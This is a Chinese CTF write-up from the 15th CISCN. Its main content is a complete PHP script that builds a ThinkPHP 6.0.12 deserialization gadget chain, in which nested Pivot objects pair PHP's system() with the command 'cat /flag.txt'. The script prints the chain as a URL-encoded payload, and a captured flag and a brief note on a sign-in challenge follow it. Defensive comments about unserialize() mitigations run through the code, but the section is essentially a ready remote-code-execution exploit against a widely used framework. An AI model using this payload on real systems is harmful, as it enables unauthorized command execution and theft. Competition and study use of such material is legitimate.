第十五届CISCN

web

Ezpop

ThinkPHP V6.0.12 LTS 反序列化

<?php
namespace think{
    /**
     * Local stand-in that reuses the class name think\Model, so serialize()
     * emits an object carrying this name and these property names.
     *
     * This listing only builds data. How the real framework class consumes the
     * properties during unserialize() is not shown on this page.
     *
     * Defensive takeaway: an application is exposed only if it passes
     * client-controlled bytes to unserialize(). Decode untrusted input with
     * json_decode(), or call unserialize($s, ['allowed_classes' => false]).
     *
     * NOTE(review): property names and visibility presumably mirror the
     * framework's own Model class - confirm against the framework source before
     * relying on this for detection signatures. Declaration order and
     * visibility determine the serialized bytes, so they are left untouched.
     */
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;

        /**
         * Fills every property with fixed values.
         *
         * @param mixed $obj Stored unchanged in $table. The script's final
         *                   statement passes another Pivot here, so the
         *                   serialized graph nests one object inside the other.
         */
        function __construct($obj = ''){
            $this->lazySave = True;
            // Key 'whoami' holds a shell command string that reads the CTF flag file.
            $this->data = ['whoami' => ['cat /flag.txt']];
            $this->exists = True;
            $this->table = $obj;
            // The same key holds the name of PHP's system() function. A callable
            // name sitting next to a command string inside a serialized Model is
            // the indicator to look for in request logs and WAF rules.
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    /**
     * Concrete subclass of the abstract think\Model stand-in.
     *
     * It adds no members of its own. It exists so the script can instantiate an
     * object that serializes under the class name think\model\Pivot.
     */
    class Pivot extends \think\Model
    {
    }
}

namespace {
    // Build the nested object graph, then print it serialized and URL-encoded.
    // Nothing here contacts a remote system: the printed string has an effect
    // only where an application feeds request data to unserialize().
    $inner = new think\model\Pivot();
    $outer = new think\model\Pivot($inner);
    echo urlencode(serialize($outer));
}

flag{362d6bde-12ce-47e8-b09f-a232f0b97ee1}

签到电台

得到提示,s打开

然后将得到的结果传过去即可
